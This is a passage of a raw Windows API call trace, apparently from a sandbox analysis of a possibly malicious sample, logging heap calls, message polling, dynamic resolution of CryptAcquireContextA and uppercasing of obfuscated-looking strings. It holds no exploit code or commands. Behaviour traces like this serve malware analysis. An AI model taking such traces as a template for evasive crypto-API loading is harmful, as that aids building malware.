returned 20 [0254.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.582] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0254.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0254.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0254.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.583] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0254.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0254.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.583] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0254.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0254.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0254.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0254.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0254.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0254.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0254.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0254.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.585] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0254.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0254.588] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0254.588] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0254.588] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0254.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0254.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0254.589] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0254.589] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.589] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0254.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0254.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0254.589] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.589] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.589] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.589] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0254.589] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0254.589] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0254.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0254.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0254.590] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0254.590] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.590] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0254.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0254.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0254.590] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.590] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.590] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0254.590] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0254.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.590] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0254.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0254.591] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0254.591] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.591] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0254.591] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.591] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.591] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.591] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.591] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.592] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.592] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.592] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0254.592] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.592] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0254.592] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.592] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0254.592] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.593] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.593] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.593] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.593] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.593] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.593] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.593] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0254.593] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.594] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0254.594] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.594] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.594] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.594] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.594] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.594] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0254.595] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.595] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.595] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.595] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.595] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.595] 